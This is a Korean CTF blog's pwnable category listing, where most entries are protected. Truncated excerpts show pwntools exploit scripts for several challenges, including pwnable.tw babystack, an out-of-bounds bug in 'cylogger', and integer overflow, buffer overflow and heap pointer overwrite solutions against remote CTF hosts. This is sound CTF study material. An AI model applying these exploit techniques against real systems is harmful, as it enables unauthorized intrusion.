목록Security/Pwnable (146)
cdor1's lab
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
from pwn import * #s = remote('chall.pwnable.tw', 10205) s = process('./babystack',env={'LD_PRELOAD':'./libc_64.so.6'}) password = '' libc_leak = '' def input_passwd(passwd): s.recvuntil('>> ') s.sendline('1') s.recvuntil('Your passowrd :') s.send(passwd) return s.recvuntil('!') def cp(data): s.recvuntil('>> ') s.sendline('3') s.recvuntil(' :') s.send(data) for i in range(0, 16): for j in range(..
서브취약점(OOB-Out Of Bound) 브포해서 풀었지만 실수로 쉘을 날려보낸 슬픈 스토리가 있는 익스코드이다. from pwn import * #s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'}) while True: try: s = remote('10.10.200.203', 10002) def Leave(select, size, data): s.recvuntil('>> ') s.sendline('L') s.recvuntil('>> ') s.sendline(str(select)) if(select == 1): s.recvuntil('Size of Log >>') s.sendline(str(size)) s.sendline(data) def See..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
50 - Just Integer overflow at selling and get flag100 - Just buffer overflow and get flag 150 - Heap pointer overwrite from pwn import * #s = process('./item') s = remote('112.166.114.143', 317) def add(data): print s.recvuntil('> ') s.sendline('1') print s.recvuntil('input content: ') s.sendline(data) def show(): print s.recvuntil('> ') s.sendline('2') def delete(idx): print s.recvuntil('> ') s..
보호되어 있는 글입니다.